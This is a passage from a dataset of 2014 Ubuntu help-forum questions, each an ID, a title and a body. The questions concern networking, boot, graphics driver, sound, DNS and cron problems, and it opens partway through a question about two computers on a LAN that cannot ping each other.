txqueuelen:0 rx bytes:8414 ( 8.4 kb ) tx bytes:8414 ( 8.4 kb ) wlan0 link encap : ethernet hwaddr 00:22:43:9b:7b:64 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :222:43ff : fe9b:7b64/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:252 errors:0 dropped:0 overruns:0 frame:0 tx packets:435 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:123143 ( 123.1 kb ) tx bytes:65828 ( 65.8 kb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination edit : example of the error when computer 1 tries to ping computer 2 : ping 192.168.1.2 ping 192.168.1.2 ( 192.168.1.2 ) 56 ( 84 ) bytes of data . from 192.168.1.77 icmp_seq=1 destination host unreachable from 192.168.1.77 icmp_seq=2 destination host unreachable from 192.168.1.77 icmp_seq=3 destination host unreachable from 192.168.1.77 icmp_seq=4 destination host unreachable from 192.168.1.77 icmp_seq=5 destination host unreachable from 192.168.1.77 icmp_seq=6 destination host unreachable ^c -- - 192.168.1.2 ping statistics -- - 7 packets transmitted , 0 received , +6 errors , 100 % packet loss , time 6031ms pipe 3 edit 2 : arp -a of both computers computer 1 : ? ( 192.168.1.254 ) at 20:76:00 : f5:3b:70 [ ether ] on wlan0 computer 2 : ? ( 192.168.1.254 ) at 20:76:00 : f5:3b:70 [ ether ] on wlan0 ? ( 192.168.1.77 ) at < incomplete > on wlan0 edit 3 : nmap -sn 192.168.1.0/24 on computer 2 starting nmap 6.40 ( http : //nmap.org ) at 2014-05-07 21:14 pdt nmap scan report for 192.168.1.2 host is up ( 0.00024s latency ) . nmap done : 256 ip addresses ( 1 host up ) scanned in 3.30 seconds edit 4 : the tcpdump logs of both computers while the first ping 192.168.1.254 and then each other : computer 1 : tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on wlan0 , link-type en10mb ( ethernet ) , capture size 65535 bytes 22:45:01.661300 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:02.659393 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:03.659394 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:04.676872 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:05.675391 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:06.675396 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:07.692825 arp , request who-has 192.168.1.2 tell 192.168.1.77 , length 28 22:45:48.379058 arp , request who-has 192.168.1.77 tell 192.168.1.254 , length 28 22:45:48.379108 arp , reply 192.168.1.77 is-at c4:85:08:77 : d3 : f5 , length 28 22:45:54.419388 arp , request who-has 192.168.1.254 tell 192.168.1.77 , length 28 22:45:54.420875 arp , reply 192.168.1.254 is-at 20:76:00 : f5:3b:70 , length 28 computer 2 : reading from file pc2.pcap , link-type en10mb ( ethernet ) 22:44:43.538367 arp , request who-has 192.168.1.254 tell 192.168.1.2 , length 28 22:44:43.676705 arp , reply 192.168.1.254 is-at 20:76:00 : f5:3b:70 ( oui unknown ) , length 28 22:45:02.107935 arp , request who-has 192.168.1.254 tell 192.168.1.2 , length 28 22:45:02.107951 arp , reply 192.168.1.254 is-at 20:76:00 : f5:3b:70 ( oui unknown ) , length 28 22:45:06.780619 arp , request who-has 192.168.1.77 tell 192.168.1.2 , length 28 22:45:07.778419 arp , request who-has 192.168.1.77 tell 192.168.1.2 , length 28 22:45:08.778419 arp , request who-has 192.168.1.77 tell 192.168.1.2 , length 28 22:45:09.796214 arp , request who-has 192.168.1.77 tell 192.168.1.2 , length 28 edit 5 : setup static ips for both computers etho0 and connected them with an internet cable . both computers can definitely ping each other through the ethernet cable ! ifconfig -a eth0 results : computer 1 : eth0 link encap : ethernet hwaddr 68:68:68:00:62 : a4 inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6a68:68ff : fe00:62a4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4060 ( 4.0 kb ) tx bytes:7629 ( 7.6 kb ) computer 2 : eth0 link encap : ethernet hwaddr 00:24:8c : ae : f6:91 inet addr:192.168.1.20 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:8cff : feae : f691/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:250 errors:0 dropped:0 overruns:0 frame:0 tx packets:130 errors:0 dropped:0 overruns:0 carrier:3 collisions:0 txqueuelen:1000 rx bytes:26501 ( 26.5 kb ) tx bytes:20897 ( 20.8 kb )
462644	installing ubuntu 14.04 black screen / freeze	i am running : windows 8 pro with media center 64bit 990fxa-gd80 ( ms-7640 ) amd fx 8150 eight-core processor x64 two amd radeon hd 7900 series 32 gb ram i have installed windows on primary hdd . i have installed wubi on secondary hdd . windows detects ubuntu 14.04 and offers an option to boot either os . i pick ubuntu to finish install . computer restarts . gnu grub comes up with options to install as normal mode , safe graphic mode , acpi workarounds , verbose mode , and demo mode . also the option to access the grub > and edit boot options via e key . i have entered entered : nomodeset , radeon.modeset=0 , radeon.modeset=1 all attempt to install ubuntu have resulted in either a black screen with monitor saying no signal , or ubuntu logo , purple background and white dots blinking from left to right then the gui freezes and i still have the use of mouse . my goal posting here is to acquire the information to install ubuntu via terminal / text only so that i can install video drivers after the install . i have the linux video drivers on the hdd that i am using to install , so implementing the video drivers before the install from the gnu grub `` grub > '' command line . i will also consider using vbox to install then from inside guest to install into psychical hdd . any options or ideas i will love you forever ! edit : i installed ubuntu server 14.04 installed video drivers installed ubuntu desktop fixed my own problem .
462645	atheros wireless adapter led does n't turn off	i know this is kind of a nit-pick but i would still like it solved . my wireless led is always on , even if wifi is turned off . i have confirmed that when i turn wifi off in the os , the transmit power goes to 0 just like it should . i also confirmed that in this state the ifconfig command does n't list wlan0 , only my loopback and eth0 interfaces just as it should . the led remains lit up though . anyone know a way to change this ? it is n't a huge deal , but i often will turn off wifi if i 'm going to be in an area where i ca n't use it to save power and an visual identification of if it is off or not would be nice . as a side note in 13.04 and previous , the led worked just fine . i have seen a few other questions like this but have yet to see any solutions . my computer is an asus eeepc 1005hab and does not have bluetooth .
462647	how can i redirect *.localhost to 127.0.0.1 in ubuntu 14.04 ?	i used to be able to make foo.localhost , bar.localhost , etc . resolve to 127.0.0.1 by adding address=/localhost/127.0.0.1 to /etc/dnsmasq.conf but dnsmasq.conf does n't exist in ubuntu 14.04 , and just creating it and adding the line does n't work . creating /etc/dnsmasq.d/star-dot-localhost with the line does n't work either . so how do i do wildcard dns redirection in ubuntu 14.04 ?
462650	can not open ubuntu , stuck with intramfs	i 'm using ubuntu 13.10 . i 'm trying to upgrade to 14.04 . after the upgrade ubuntu is not opening up . i 'm stuck with this black screen saying : mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target file system does n't have /sbin/init no init found . try passing init= bootarg btw , my desktop is dual boot . i 'm using windows 7 and ubuntu 13.10 . i used wubi . i 'm using a different hard drive for the two oss , so there 's no problem with partitioning . how do i fix this ? : ( i tried to update it twice . // uninstalled and reinstalled wubi which gave me ubuntu 12.10 which i was able to upgrade to 13.10 . now i want ubuntu 14.04 , but it always crashes . : (
462651	how to remove dummy packages ?	i have searched and i believe there is no a question like this one . whenever my laptop finds updates the software updater application comes up as usual however it is always showing the package highlighted in the picture ( both with the square and the cursor ) . i 'm unable to check them , nor update them . is there a way of updating them or delete them ?
462652	the `` low graphics error '' on an hp pavilion laptop	so i have installed 14.04 on a pavilion no problem . in fact it was flawless . now when i boot up for the first time i get the `` the system is running in low-graphics mode '' window of death . reading other answers i should be booting into rescue mode to try some fixes from this thread - how to fix `` the system is running in low-graphics mode '' error ? my problem is holding down 'shift ' while booting does n't give me the option to enter rescue mode , in fact it seems to make no difference to the normal startup procedure . what to do ?
462653	all my partitions are not show after installing ubuntu 14.4	i had windows 8.1 installed in my system and i had 3 partitions in it.i installed ubuntu 14.4 with replace windows 8.1 option.after installing ubuntu i had only one partition.whether all my partitions are erased if so how can i recover all those because i have very important files in the partitions pleas help me ? ? ?
462655	lubuntu 14.04 - no soundcard detected hda intel realtek alc880	after fresh install of lubuntu 14.04 no sound card is detected . alsamixer shows just beep bar ( pc speaker ) , all inputs and outputs are just not present . no volume panel in the main bar was present . what i did try : google hard for any solution without major sucess installation of some libraries ( pulseaudio ) - it adds just the nvidia hdmi output and volume panel , but not the soundcard 's output inserting options snd-hda-intel model=generic or model=auto into /etc/modprobe.d/alsa-base.conf and restart inserting options snd-hda-intel position_fix=1 model=medion into /etc/modprobe.d/alsa-base.conf and restart with inserting options snd-hda-intel model=fujitsu into /etc/modprobe.d/alsa-base.conf and restart windows sound goes ok after correct driver is present . dmesg |grep -i snd_hda shows ( after modprobe is edited ) 2 lines showing the profile for msi/msi-x is used on irq 45 and 47 alsamixer identifies card as hda intel and chip as realtek alc880 google shows just problematic results from ubuntu 8.10 version . it is an old fujitsu-siemens mainboard with pentium d and integrated sound card . next solution would be to insert an old pci sound card into it ... -d : c ( does someone has a success with it ? update : after bounty without answer , many attempts to solve this issue i added a simple sound card into pci slot and everything works with no problem . this realtek on-board chipset i canot recommend with ubuntu . : c\
462656	wireless 11a does not support on lenovo l440 ( intel 7260 )	after upgrade to 14.04 , the intel 7260 on lenovo l440 does not support 11a support . it works well on 13.10. lshw -c network *-network description : ethernet interface product : ethernet connection i217-v vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 05 serial : 3c:97:0e : e9:71 : b4 width : 32 bits clock : 33mhz capabilities : pm msi cap_list ethernet physical configuration : broadcast=yes driver=e1000e latency=0 multicast=yes resources : irq:20 memory : f5500000-f551ffff memory : f553f000-f553ffff ioport:6080 ( size=32 ) *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 6b serial : 7c:7a:91:1e:1e:96 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 ip=192.168.1.16 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:49 memory : f5400000-f5401fff is there any way to reenable 11a support ?
462659	is my computer being hacked ? strange goings-on with menu.lst	i installed my kubuntu 12.04 in windows with wubi . i 've never installed any other version of linux on my netbook , definitely not tiny core linux . yet i have the following lines commented out in my menu.lst file : # title tinycore linux # kernel ( hd0,2 ) /boot/bzimage # initrd ( hd0,2 ) /boot/tinycore i 'm worried that this might be a symptom of a malware infection . there 's been other suspicious activity too . those lines appeared uncommented at the shell prompt while i was editing my menu.lst file : robert @ ubuntu : /host/boot $ in bash : syntax error near unexpected token in' robert @ ubuntu : /host/boot $ title puppeee ( on /dev/hda1 ) bash : syntax error near unexpected token ( ' robert @ ubuntu : /host/boot $ root ( hd0,0 ) bash : syntax error near unexpected token `hd0,0' robert @ ubuntu : /host/boot $ kernel /peee/vmlinuz psubdir=peee pkeys=us it looks like someone was trying to remotely overwrite the commented lines in my menu.lst file with uncommented ones while i had the menu.lst file open for editing but wound up writing the lines to the shell prompt instead . basically i 'm worried that someone is using tiny core linux to control my pc remotely . are my fears warranted ? is there anything i can do to stop this ?
462663	how do i create a cloud ?	so i am kind of new at this , but i have my mind set on creating a cloud . by cloud i mean a place where i can store file and access them from anywhere , like dropbox or google drive . i cant really find a step by step guide on what i need to do in order to create one . i have an old computer that i would like to use but i do n't know how to set everything up . if i will need more than one computer i can get that , although i would like to use only one if possible . by the way i am not looking for a software program , such as owncloud or others , i am looking for an operating system .
462664	steadyflow extension chrome	can steadyflow download manager run on chrome ? i ca n't integrate steadyflow with chrome . someone help me please ? i 'm a new immigrant from windows and now use kubuntu 14.04. i 'm sorry my english is bad
462669	update from 12.04 to 14.04 , cron stops working	i am having trouble of using cron after updating from 12.04 to 14.04. here is my log : may 8 11:00:01 imanqasrina cron [ 30716 ] : ( sicksand ) cmd ( bash $ home/bingwallpaper/bingpaper_v1-0.sh ) may 8 11:00:01 imanqasrina cron [ 30717 ] : ( root ) cmd ( /usr/local/bin/flexget -- cron ) may 8 11:05:01 imanqasrina cron [ 31963 ] : ( sicksand ) cmd ( /usr/bin/notify-send `` notify from cron '' ) and here is my crontab -l # min hour mday month wday command 0 11 * * * bash $ home/bingwallpaper/bingpaper_v1-0.sh 5 * * * * /usr/bin/notify-send `` notify from cron ''
462670	unity or gnome for ubuntu 14.04 ?	i made clean installation of ubuntu 14.04 on 18th of april . then to overcome the problem of heating , i installed the fglrx-updates driver for my radeon hd 7730m graphics . yesterday , on boot everything looked fine until i get to the login screen . after putting in my password and logging in the login screen disappears , however my desktop never loaded and the mouse and keyboard become non-responsive . the desktop background also did n't show up . the only thing i can do at that point is force power down . so , as per the answer given on this page , i tried the steps but all in vain . so , i made a live usb of ubuntu 14.04 and reinstalled in the same partitions as before . now , it 's working fine . but can somebody tell me whether switching to gnome is better ? because , yesterday i could n't give a seminar since my slides were stored in ubuntu . now if this problem keeps popping up , it 's gon na create problems for me .
462671	boot problems after upgrading from ubuntu 13.04 to ubuntu 14.04	after grub went mia i used boot-repair which returned this boot-repair boot info script . after that grub came back , but now after i choose the ubuntu option in the boot menu nothing happens . if i go to advanced and choose any of the kernels , nothing happens after loading initram . is there any way to repair this problem ? warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 32.0 gb , 32017047552 bytes 256 heads , 63 sectors/track , 3877 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x63d41749 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt disk /dev/mapper/ubuntu -- vg-root : 991.2 gb , 991248252928 bytes 255 heads , 63 sectors/track , 120512 cylinders , total 1936031744 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 8451 mb , 8451522560 bytes 255 heads , 63 sectors/track , 1027 cylinders , total 16506880 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table ubuntu @ ubuntu : /boot $ cat /etc/mtab /cow / overlayfs rw 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 /dev/sr0 /cdrom iso9660 ro , noatime 0 0 /dev/loop0 /rofs squashfs ro , noatime 0 0 none /sys/fs/cgroup tmpfs rw 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /sys/firmware/efi/efivars efivarfs rw 0 0 tmpfs /tmp tmpfs rw , nosuid , nodev 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 none /sys/fs/pstore pstore rw 0 0 systemd /sys/fs/cgroup/systemd cgroup rw , noexec , nosuid , nodev , none , name=systemd 0 0 gvfsd-fuse /run/user/999/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=ubuntu 0 0 /dev/sda1 /mnt/boot-sav/sda1 vfat rw 0 0 /dev/sda2 /mnt/boot-sav/sda2 ext2 rw 0 0 /dev/sdb2 /mnt/boot-sav/sdb2 fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 /dev/mapper/ubuntu -- vg-root /mnt/boot-sav/mapper/ubuntu -- vg-root ext4 rw 0 0 ubuntu @ ubuntu : /boot $ sudo lvscan active '/dev/ubuntu-vg/root ' [ 923.17 gib ] inherit active '/dev/ubuntu-vg/swap_1 ' [ 7.87 gib ] inherit
462672	ubuntu 14.04 ati legacy drivers compile error : /lib/modules/ ... /build/include/linux/version.h not found	short story , get error ! bad return status for module build on kernel : 3.13.0-24-generic ( x86_64 ) and kernel includes at /lib/modules/3.13.0-24-generic/build/include not found or incomplete when trying to install fglrx from amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64 for two radeon hd 2600 xt . long story : when installing ubuntu 14.04 from livecd monitor4 did n't get any signal and i got `` could not switch the monitor configuration/could not set the configuration for crtc 64 '' error . i pushed through . after the install and reboot monitor4 started to work but 3 does n't and got the same crtc 64 pop up error at login screen , also graphics/cursor is kinda jumpy and not smooth . figured i 'll to install fglrx drivers manually $ sudo lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] [ 1002:9588 ] 04:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] [ 1002:9588 ] looks like it sees all 4 monitors $ sudo xrandr screen 0 : minimum 320 x 200 , current 7680 x 1200 , maximum 8192 x 8192 dvi-0 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 519mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 ... more resolutions ... din disconnected ( normal left inverted right x axis y axis ) dvi-1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 ... more resolutions ... dvi-1-2 connected 1920x1080+3840+0 527mm x 296mm 1920x1080 60.0*+ 50.0 59.9 30.0 30.0 1920x1080i 60.1 50.0 60.0 ... more resolutions ... din-1-1 disconnected dvi-1-3 connected 1920x1080+5760+0 527mm x 296mm 1920x1080 60.0*+ 50.0 59.9 30.0 30.0 1920x1080i 60.1 50.0 60.0 ... more resolutions ... 1920x1080 ( 0x45 ) 148.5mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz ... more resolutions ... notice error ! bad return status for module build on kernel : 3.13.0-24-generic ( x86_64 ) $ sudo dpkg -i fglrx*.deb selecting previously unselected package fglrx . ( reading database ... 167116 files and directories currently installed . ) preparing to unpack fglrx_8.970-0ubuntu1_amd64.deb ... unpacking fglrx ( 2:8.970-0ubuntu1 ) ... selecting previously unselected package fglrx-amdcccle . preparing to unpack fglrx-amdcccle_8.970-0ubuntu1_amd64.deb ... unpacking fglrx-amdcccle ( 2:8.970-0ubuntu1 ) ... selecting previously unselected package fglrx-dev . preparing to unpack fglrx-dev_8.970-0ubuntu1_amd64.deb ... unpacking fglrx-dev ( 2:8.970-0ubuntu1 ) ... setting up fglrx ( 2:8.970-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl32.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl32.icd ( of link group x86_64-linux-gnu_gl_conf ) does n't exist update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) loading new fglrx-8.970 dkms files ... first installation : checking all kernels ... building only for 3.13.0-24-generic building for architecture x86_64 building initial module for 3.13.0-24-generic error ! bad return status for module build on kernel : 3.13.0-24-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.970/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ( 0.100.0-16 ) ... ureadahead will be reprofiled on next reboot processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... setting up fglrx-amdcccle ( 2:8.970-0ubuntu1 ) ... setting up fglrx-dev ( 2:8.970-0ubuntu1 ) ... processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... /var/lib/dkms/fglrx/8.970/build/make.log $ cat /var/lib/dkms/fglrx/8.970/build/make.log dkms make.log for fglrx-8.970 for kernel 3.13.0-24-generic ( x86_64 ) wed may 7 21:44:57 edt 2014 amd kernel module generator version 2.1 kernel includes at /lib/modules/3.13.0-24-generic/build/include not found or incomplete file : /lib/modules/3.13.0-24-generic/build/include/linux/version.h linux headers installed $ sudo dpkg -l | grep linux-headers ii linux-headers-3.13.0-24 3.13.0-24.47 all header files related to linux kernel version 3.13.0 ii linux-headers-3.13.0-24-generic 3.13.0-24.47 amd64 linux kernel headers for version 3.13.0 on 64 bit x86 smp ii linux-headers-generic 3.13.0.24.29 amd64 generic linux kernel headers /lib/modules/3.13.0-24-generic/build/include/linux/version.h is in fact not there $ ls -l /lib/modules/3.13.0-24-generic/build/include/linux/ve* lrwxrwxrwx 1 root root 57 may 2 20:39 /lib/modules/3.13.0-24-generic/build/include/linux/vermagic.h - > ../../../linux-headers-3.13.0-24/include/linux/vermagic.h lrwxrwxrwx 1 root root 57 may 2 20:39 /lib/modules/3.13.0-24-generic/build/include/linux/vexpress.h - > ../../../linux-headers-3.13.0-24/include/linux/vexpress.h
462673	installing php 5.3 in ubuntu 14.04	i 've just installed ubuntu 14.04 and am trying to install php 5.3 . but when i run apt-get install php5 it 's installing php 5.5.9-1ubuntu4 . i need to use php 5.3 in the system because the application i 'm working on is built with php 5.3 . please shed some light on this issue . how can i achieve this ? thanks in advance . regards ,
462676	system is running under low graphic mode , unable to log in .	my system is showing a message `` system running under low graphic mode '' . when i try to open the terminal using cntrl+alt+f1 it displays the login prompt . i enter the username and password but it continues to ask for the username and password continuously . how can i log in with the terminal ?
462679	recover lubuntu modified system file	i edited /usr/share/polkit-1/actions/org.freedesktop.upower.policy in lubuntu 14.04 and somehow ended up with an empty file being saved . this has disabled hibernation in my computer . can someone provide me with the contents of the file ?
462680	with maas set to manage dns on a subnet on a private ip range , why do only some nodes have dns entries ?	i 'm trying to set up openstack on maas , using trusty . i have a network between these machines all bridged/switched together . i have set up maas at 192.168.7.200 , i have a juju client machine at 192.168.7.201 , and my `` normal '' laptop machine at 192.168.7.199 . i have maas set to use 192.168.7.32-192.168.7.195 . i have also set the router , 192.168.7.1/24 to also route for 192.168.64.1/19 , which i intend to use later . i have maas set to manage dns and dhcp . i went ahead and bootstrapped juju , and that worked . from my juju client machine , i can ping the juju bootstrap node : juju status environment : maas machines : `` 0 '' : agent-state : started agent-version : 1.18.2 dns-name : c3enj.maas instance-id : /maas/api/1.0/nodes/node-d4feaf72-d658-11e3-8737-525400671a47/ series : trusty `` 1 '' : agent-state : started agent-version : 1.18.2 dns-name : 3epj7.maas instance-id : /maas/api/1.0/nodes/node-37735c5c-d659-11e3-818d-525400671a47/ series : trusty services : juju-gui : charm : cs : trusty/juju-gui-2 exposed : true units : juju-gui/0 : agent-state : started agent-version : 1.18.2 machine : `` 1 '' open-ports : - 80/tcp - 443/tcp public-address : 3epj7.maas erik @ openstackjuju : ~ $ ping c3enj.maas ping 192-168-7-184.maas ( 192.168.7.184 ) 56 ( 84 ) bytes of data . 64 bytes from 192-168-7-184.maas ( 192.168.7.184 ) : icmp_seq=1 ttl=64 time=0.661 ms 64 bytes from 192-168-7-184.maas ( 192.168.7.184 ) : icmp_seq=2 ttl=64 time=0.730 ms ^c -- - 192-168-7-184.maas ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 0.661/0.695/0.730/0.043 ms erik @ openstackjuju : ~ $ ping 3epj7.maas ping : unknown host 3epj7.maas erik @ openstackjuju : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.7.200 nameserver 192.168.7.200 search maas i do n't get what is going on here . how should dns be set up ? i will say that i started out with setting nothing in the box `` default domain for new nodes '' in maas , but then had some dns lookup issues contacting the bootstrap node , so i decided to start over . i removed all machines from maas , set the setting to `` vcluster.erikbandersen.com '' , and then erased/reset the harddrives on the nodes , and re-ran them through the pxe booting and commissioning process . i set the vcluster.erikbandersen.com to have an ns record that points to the maas server ( though it is a private ip address , 192.168.7.200 , so a recursive name server could n't resolve the query ) . as shown before , my juju client machine is set to look directly to the maas server for dns queries , so it should hopefully be able to resolve the queries without running into trouble by going directly to the source , instead of asking a recursive nameserver that ca n't reach the private ip range to resolve the address for it . as you can also see , i can directly query the maas dns server with dig , and it will not return any record for the machine . erik @ openstackjuju : ~ $ dig a 3epj7.maas ; < < > > dig 9.9.5-3-ubuntu < < > > a 3epj7.maas ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : nxdomain , id : 54842 ; ; flags : qr aa rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 1 ; ; opt pseudosection : ; edns : version : 0 , flags : ; udp : 4096 ; ; question section : ; 3epj7.maas . in a ; ; authority section : maas . 300 in soa maas . nobody.example.com . 127 600 1800 604800 300 ; ; query time : 0 msec ; ; server : 192.168.7.200 # 53 ( 192.168.7.200 ) ; ; when : wed may 07 21:08:58 pdt 2014 ; ; msg size rcvd : 93 erik @ openstackjuju : ~ $ dig a c3enj.maas ; < < > > dig 9.9.5-3-ubuntu < < > > a c3enj.maas ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 6111 ; ; flags : qr aa rd ra ; query : 1 , answer : 2 , authority : 1 , additional : 2 ; ; opt pseudosection : ; edns : version : 0 , flags : ; udp : 4096 ; ; question section : ; c3enj.maas . in a ; ; answer section : c3enj.maas . 300 in cname 192-168-7-184.maas . 192-168-7-184.maas . 300 in a 192.168.7.184 ; ; authority section : maas . 300 in ns maas . ; ; additional section : maas . 300 in a 192.168.7.200 ; ; query time : 0 msec ; ; server : 192.168.7.200 # 53 ( 192.168.7.200 ) ; ; when : wed may 07 21:09:07 pdt 2014 ; ; msg size rcvd : 113 what am i missing here ? why , after me setting the dns setting to have `` vcluster.erikbandersen.com '' as the ( post ? ) fix for the dns , are names not in the format `` 3epj7.vcluster.erikbandersen.com '' and instead becoming `` 3epj7.maas '' ? further , why is the maas server itself answering dns queries for some of the addresses but not all ? is there any way to debug this further ? here is a debugging report generated with sosreport .
462682	ubuntu 14.04 wo n't boot alongside mint 16	i have just installed ubuntu 14.04 desktop 64-bit alongside a pre-installed mint 16 . i let the installer re-partition my 160gb hdd evenly between the 2 oses . it never asked me about grub , boot loader , etc . now , it immediately boots into mint . no grub menu or anything . what have i done wrong ? ! please help .
462687	how to receive all recent update info about ubuntu12.04 lts ?	i want to know about the recent changes that happen on ubuntu12.04 lts . in other words , i want to keep tracking all ubuntu desktop 's standard packages on my eye . but is there any automated method instead of one-by-one method ? standard tool or self-making script will be welcome . will anyone do me a favor ?
462688	xfce , network manager difficult to use	to get ubuntu working with the wifi of my compaq cq62 laptop i have to install an older version of crunchbang . i then typically install the xubuntu packages to get the xfce desktop or the kubuntu packages for kde . kde is bloated and a bit quirky , but it had a nice interface for the wifi . i also installed the standard unity desktop , which also has a nice wifi , but is less customizable than i like . i really like xfce for its speed and reliability , but the network manager is really complicated and does not seem to always work . the network manager in xfce is complicated and seems to lack some common sense buttons like 'connect ' or even an automatically updating list of available networks . i installed 'wifi radar ' , which is better , but it does not seem to actually connect me to any networks even when i configure a new connection . it just hangs , never quite completing the operation . it also seems to only update the list available networks once , when the program initially loads . is there a way i can make the network manager that the standard unity desktop uses work under xfce ? i have both desktop managers installed , and can switch back and forth as need be from the login screen . this should mean that the desired interface is already installed , but it is only used in unity ( called 'ubuntu 2d ' in my login screen ) . what is the name of the program and is there a way to make a shortcut to it in one of the bars on my xfce desktop ? it would be nice to have the exact same icon and functionality as unity uses for wifi in the xfce environment as that network manager is so simple and always works .
